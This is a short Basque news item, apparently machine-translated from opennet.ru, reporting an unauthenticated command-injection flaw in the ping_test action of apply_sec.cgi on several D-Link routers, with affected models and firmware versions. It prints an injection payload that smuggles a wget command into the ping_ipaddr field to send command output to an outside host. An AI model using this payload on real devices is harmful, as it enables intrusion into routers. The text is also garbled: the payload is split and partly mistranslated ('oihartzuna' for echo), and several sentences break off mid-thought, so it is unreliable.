D-Link haririk gabeko bideratzaileetan
Interesgarria da firmware-en garatzaileen arabera, "ping_test" deia autentifikatu ondoren bakarrik exekutatu behar da, baina errealitatean deitzen da edozein kasutan, web interfazean saioa hasi gabe. Bereziki, apply_sec.cgi script-era sartzean eta βaction=ping_testβ parametroa pasatzean, script-ak autentifikazio-orrira birbideratzen du, baina aldi berean ping_test-ekin lotutako ekintza egiten du. Kodea exekutatzeko, beste ahultasun bat erabili zen ping_test-en bertan, ping utilitateari deitzen diona probak egiteko bidalitako IP helbidearen zuzentasuna behar bezala egiaztatu gabe. Adibidez, wget utilitateari deitzeko eta "echo 1234" komandoaren emaitzak kanpoko ostalari batera transferitzeko, zehaztu besterik ez dago "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" parametroa. test.test/?$( oihartzuna 1234)".
Ahultasunaren presentzia ofizialki baieztatu da eredu hauetan:
- DIR-655 firmware 3.02b05 edo zaharragoa duena;
- DIR-866L firmware 1.03b04 edo zaharragoa duena;
- DIR-1565 firmware 1.01 edo zaharragoa duena;
- DIR-652 (ez da firmware bertsio arazotsuei buruzko informaziorik ematen)
Dagoeneko iraungi da eredu hauentzako laguntza epea, beraz, D-Link
Geroago aurkitu zen ahultasuna ere bazela
Iturria: opennet.ru